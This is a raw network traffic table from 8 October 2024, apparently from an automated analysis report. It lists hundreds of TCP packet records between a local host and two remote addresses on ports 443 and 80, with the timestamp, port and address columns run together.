                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863925934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863984108 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.863993883 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.864022970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.864022970 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917587042 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917627096 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917686939 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917699099 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917717934 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917814016 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917839050 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917882919 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917891979 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.917903900 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.919943094 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.919974089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.920020103 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.920028925 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.920041084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924489021 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924511909 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924595118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924595118 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924602985 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924792051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924817085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924864054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924869061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.924890041 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925121069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925144911 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925174952 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925182104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.925199986 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969588041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969624043 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969696999 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969708920 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969753981 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969890118 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969932079 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969973087 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969976902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.969989061 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.985614061 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004885912 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004911900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004981995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004981995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.004990101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005292892 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005323887 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005470037 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005470037 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.005475998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007189989 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007213116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007262945 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007268906 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007293940 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.007801056 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012229919 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012263060 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012317896 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012317896 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012324095 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012500048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012531996 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012545109 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012562037 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012567043 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012594938 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012741089 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012895107 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012919903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012978077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012978077 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.012983084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.014060020 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056548119 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056583881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056638956 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056649923 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056710958 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056858063 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056862116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056874990 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056902885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056958914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056958914 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.056965113 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.057092905 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.091881037 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.091918945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092005014 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092020035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:00.092062950 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.294315100 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.294325113 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.294342041 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.294367075 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295073032 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295092106 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295104980 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295130968 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295193911 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295207024 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295238018 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.295986891 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296034098 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296035051 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296045065 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296080112 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296091080 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296103001 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296139002 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296983004 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.296993971 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.297004938 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.297032118 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.337927103 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.354823112 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.354918003 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.354969025 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380388021 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380408049 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380418062 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380532026 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380543947 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380556107 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380595922 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380595922 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380614996 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380630016 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380641937 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380654097 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380667925 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.380685091 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381464005 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381531000 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381542921 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381571054 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381632090 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381643057 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381654024 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381664038 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381676912 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.381694078 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.415982008 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.623948097 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.623966932 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.623980045 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624017954 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624020100 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624030113 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624051094 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624056101 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624062061 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624074936 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624085903 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624088049 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624102116 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624130964 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624198914 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624211073 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624229908 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624243021 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624252081 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624254942 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624267101 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624277115 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624279976 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624293089 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624300957 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624315977 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624329090 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624335051 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624341011 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624352932 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624365091 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624389887 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624509096 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624521017 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624531984 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624543905 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624553919 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624555111 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624567986 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624576092 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624578953 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.624645948 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.625298977 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.625349045 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.627332926 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.627346992 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.627357006 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.753019094 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.753688097 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.753751993 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.753770113 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.753870010 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.753916025 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.757793903 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762604952 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762617111 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762624025 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762667894 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762681007 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762692928 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762696028 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762726068 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762742043 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762753963 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762765884 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762777090 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762788057 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762794018 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762818098 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762881994 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762892962 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762900114 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762928009 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762939930 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762952089 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762963057 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762974977 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.762981892 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763019085 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763041973 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763053894 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763065100 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763087988 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763175964 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763187885 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763199091 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763210058 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763221025 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763227940 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763238907 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763247967 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763251066 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763262033 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763273001 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763281107 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763284922 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763312101 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763825893 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763837099 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763849020 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763875008 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763886929 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763899088 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763911009 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.763935089 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764102936 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764116049 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764127016 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764147997 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764163971 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764168978 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764174938 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764187098 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764200926 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764221907 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764281988 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764293909 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764305115 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764317036 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764326096 CEST4917180192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764328957 CEST8049171192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:01.764363050 CEST4917180192.168.2.22192.3.220.40
